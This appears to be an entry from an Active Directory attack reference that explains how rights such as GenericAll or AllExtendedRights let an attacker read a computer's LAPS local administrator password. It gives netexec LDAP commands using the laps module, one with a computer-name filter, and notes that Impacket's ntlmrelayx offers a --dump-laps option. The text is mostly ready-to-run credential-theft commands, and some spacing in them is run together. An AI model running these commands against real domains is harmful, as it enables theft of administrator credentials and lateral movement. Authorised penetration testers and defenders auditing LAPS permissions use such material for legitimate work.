This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights (or combination of GetChanges and (GetChangesInFilteredSet or GetChangesAll) for domain-wise synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).
# Default commandnetexecldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --modulelaps# The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN-* etc. Default: *)netexecldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --modulelaps-Ocomputer="target-*"
Impacket's ntlmrelayx also carries that feature, usable with the --dump-laps.